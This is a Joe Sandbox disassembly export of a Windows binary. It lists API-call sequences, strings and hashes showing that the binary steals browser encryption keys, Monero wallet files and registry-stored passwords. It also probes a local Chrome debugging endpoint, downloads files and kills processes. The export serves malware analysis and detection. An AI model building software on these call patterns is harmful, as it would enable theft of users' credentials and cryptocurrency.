                                      • Instruction ID: a9be3c715da6a760a176a6b018a6425da7bd72c74e61f76cb473f94d601f6ec7
                                      • Opcode Fuzzy Hash: 228b61006e8760cd46e17e4529b9288a340357d0b52c546d7b0d20c935c1bcfa
                                      • Instruction Fuzzy Hash: 7EC183B5900219ABCB14EF60DD99FDE7379BF64304F00459AF40AA7341EA71EA85CFA1
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD453C
                                      • lstrcat.KERNEL32(?,0154F380), ref: 00AD455B
                                      • lstrcat.KERNEL32(?,?), ref: 00AD456F
                                      • lstrcat.KERNEL32(?,0154D8B0), ref: 00AD4583
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD8F20: GetFileAttributesA.KERNEL32(00000000,?,00AC1B94,?,?,00AE577C,?,?,00AE0E22), ref: 00AD8F2F
                                        • Part of subcall function 00ACA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00ACA489
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD9550: GlobalAlloc.KERNEL32(00000000,00AD462D,00AD462D), ref: 00AD9563
                                      • StrStrA.SHLWAPI(?,0154F2F0), ref: 00AD4643
                                      • GlobalFree.KERNEL32(?), ref: 00AD4762
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                        • Part of subcall function 00ACA210: LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                        • Part of subcall function 00ACA210: LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD46F3
                                      • StrCmpCA.SHLWAPI(?,00AE08D2), ref: 00AD4710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AD4722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AD4735
                                      • lstrcat.KERNEL32(00000000,00AE0FA0), ref: 00AD4744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 29be228f6a287e17cd1d123672a8271aeb975c3c01c9c9e04dab7a8ea9d200d0
                                      • Instruction ID: 65b398c538f9a60e596fd0c514424f64a67ad3794838313be773e69dab15b692
                                      • Opcode Fuzzy Hash: 29be228f6a287e17cd1d123672a8271aeb975c3c01c9c9e04dab7a8ea9d200d0
                                      • Instruction Fuzzy Hash: D471A6B6910208BBDB14EBA0DD95FEE737DAB98300F004599F60697291EB34EB44CF65
                                      APIs
                                        • Part of subcall function 00AC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC12B4
                                        • Part of subcall function 00AC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC12BB
                                        • Part of subcall function 00AC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AC12D7
                                        • Part of subcall function 00AC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AC12F5
                                        • Part of subcall function 00AC12A0: RegCloseKey.ADVAPI32(?), ref: 00AC12FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AC134F
                                      • lstrlen.KERNEL32(?), ref: 00AC135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00AC1377
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AC1465
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00AC14EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 4f757487e564b731472879b09d277de43176b4a0a91bea7bd7b9395e916ef996
                                      • Instruction ID: 1d320301b51f7c32dc2545a04dd20884a9fbdfea0c7d9ddee41c9c6f7feedec5
                                      • Opcode Fuzzy Hash: 4f757487e564b731472879b09d277de43176b4a0a91bea7bd7b9395e916ef996
                                      • Instruction Fuzzy Hash: E25135B1D502185BCB15FB60DE92FED733CAF64700F4045DAB60B62192EE306B89CB66
                                      APIs
                                      • InternetOpenA.WININET(00AE0AF6,00000001,00000000,00000000,00000000), ref: 00AC9A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00AC9AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC9AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: 9a6c81adac5595dedcc05d2bb34d5d136a1a6cd38b0c0d160268033d48c12230
                                      • Instruction ID: af4166377563329ed4f8cc6540b1c7858ab88b3fc670522b2ef37ae6ebd81f87
                                      • Opcode Fuzzy Hash: 9a6c81adac5595dedcc05d2bb34d5d136a1a6cd38b0c0d160268033d48c12230
                                      • Instruction Fuzzy Hash: 56411D35A50258EBCB14EFA4CD95FDE7774BB48740F10409AF54AAB290CBB4AE80CB64
                                      APIs
                                        • Part of subcall function 00AC7330: memset.MSVCRT ref: 00AC7374
                                        • Part of subcall function 00AC7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AC739A
                                        • Part of subcall function 00AC7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AC7411
                                        • Part of subcall function 00AC7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AC746D
                                        • Part of subcall function 00AC7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00AC74B2
                                        • Part of subcall function 00AC7330: HeapFree.KERNEL32(00000000), ref: 00AC74B9
                                      • lstrcat.KERNEL32(00000000,00AE192C), ref: 00AC7666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC76A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00AC76BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC76EF
                                      • lstrcat.KERNEL32(00000000,00AE1934), ref: 00AC7700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC7733
                                      • lstrcat.KERNEL32(00000000,00AE1938), ref: 00AC774D
                                      • task.LIBCPMTD ref: 00AC775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 525cf9f91df5948945485db21448665d0484d1f45e5d874e165a67f8b4d35a7a
                                      • Instruction ID: 39a6598e7c7c2869a86179a7c4157672978ebe92070f32276a6d44890e519737
                                      • Opcode Fuzzy Hash: 525cf9f91df5948945485db21448665d0484d1f45e5d874e165a67f8b4d35a7a
                                      • Instruction Fuzzy Hash: D4316E71924208EFDB04EBA0DD96EFE7379BB44301F104209F106A73A1DA34A946CB64
                                      APIs
                                      • memset.MSVCRT ref: 00AC7374
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AC739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AC7411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AC746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC74B2
                                      • HeapFree.KERNEL32(00000000), ref: 00AC74B9
                                      • task.LIBCPMTD ref: 00AC75B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: Password
                                      • API String ID: 2808661185-3434357891
                                      • Opcode ID: 8e34959e09830d4b5ba944b5ae35932e176e5f36f7f2f194d801130732771afa
                                      • Instruction ID: 887917dd278b5315ac565dd7c505c274baa601aaf6a035451d9d1c3e038d09c8
                                      • Opcode Fuzzy Hash: 8e34959e09830d4b5ba944b5ae35932e176e5f36f7f2f194d801130732771afa
                                      • Instruction Fuzzy Hash: 4361FAB591426C9BDB24DB50CD55FDAB7B8BF54300F0081E9E689A6241DFB06BC9CFA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0154F218,00000000,?,00AE0E14,00000000,?,00000000), ref: 00AD82C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD82C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AD82E8
                                      • __aulldiv.LIBCMT ref: 00AD8302
                                      • __aulldiv.LIBCMT ref: 00AD8310
                                      • wsprintfA.USER32 ref: 00AD833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 1de84fcb86f98f107008adbea511ec7cebdf667a64bd3b66b5fda8a2c6f27846
                                      • Instruction ID: d0202eb5a022f8c7dd2993d92f3d7667b938518d5f6f40a25394fd72ee33c513
                                      • Opcode Fuzzy Hash: 1de84fcb86f98f107008adbea511ec7cebdf667a64bd3b66b5fda8a2c6f27846
                                      • Instruction Fuzzy Hash: 642108B1E54318ABDB00DFD4CD4AFAEB7B9FB44B14F10450AF619BB280C77859008BA5
                                      APIs
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                      • wsprintfA.USER32 ref: 00AC9E7F
                                      • memset.MSVCRT ref: 00AC9EED
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AC9F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AC9F17
                                      • lstrcat.KERNEL32(00000000,00AE12D8), ref: 00AC9F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00AC9F7C
                                      • memset.MSVCRT ref: 00AC9F9C
                                      • Sleep.KERNEL32(00001388), ref: 00ACA013
                                        • Part of subcall function 00AD99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD99C5
                                        • Part of subcall function 00AD99A0: Process32First.KERNEL32(00ACA056,00000128), ref: 00AD99D9
                                        • Part of subcall function 00AD99A0: Process32Next.KERNEL32(00ACA056,00000128), ref: 00AD99F2
                                        • Part of subcall function 00AD99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD9A4E
                                        • Part of subcall function 00AD99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9A6C
                                        • Part of subcall function 00AD99A0: CloseHandle.KERNEL32(00000000), ref: 00AD9A79
                                        • Part of subcall function 00AD99A0: CloseHandle.KERNEL32(00ACA056), ref: 00AD9A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 3242155833-2746444292
                                      • Opcode ID: 261368649b438f546c291b109ad454e60b1ce91e051d95f688bc1277936fe418
                                      • Instruction ID: bdbd9588d7b0cfa6fdf5016c88030cde669ce2427bb4956e0fdc9212827580ff
                                      • Opcode Fuzzy Hash: 261368649b438f546c291b109ad454e60b1ce91e051d95f688bc1277936fe418
                                      • Instruction Fuzzy Hash: A251A7B1954318ABEB24DB60DC4AFDA7378AF48700F004599F60DAB2C1EB75AB84CF55
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                      • InternetOpenA.WININET(00AE0DFB,00000001,00000000,00000000,00000000), ref: 00AC615F
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AC61DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AC6203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00AC622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AC625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00AC6299
                                      • InternetCloseHandle.WININET(?), ref: 00AC62A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC62B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 8744fb105df56eebea0508224a86c4e50be51fbe92058ac2f84c3f4ec1c8fe40
                                      • Instruction ID: c40e7959e2ea729f9a2870b531f948fe9cbba673873cdf01668ba331ce2bf6ca
                                      • Opcode Fuzzy Hash: 8744fb105df56eebea0508224a86c4e50be51fbe92058ac2f84c3f4ec1c8fe40
                                      • Instruction Fuzzy Hash: B85151B1A10318ABDB20DF90DD45FEE7779AB44301F108199F605B72C1DB74AA89CFA5
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00B4024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00B4035B
                                      • CatchIt.LIBVCRUNTIME ref: 00B403AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00B404C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 1d12612675d9bfcee877bc0127a54278b82f90eab9b0226adfa10477316158d2
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 1AB17971C20209EFCF15EFA8C8859AEBBF5FF14310F1441AAEA116B252D370DA51EB91
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBC6F
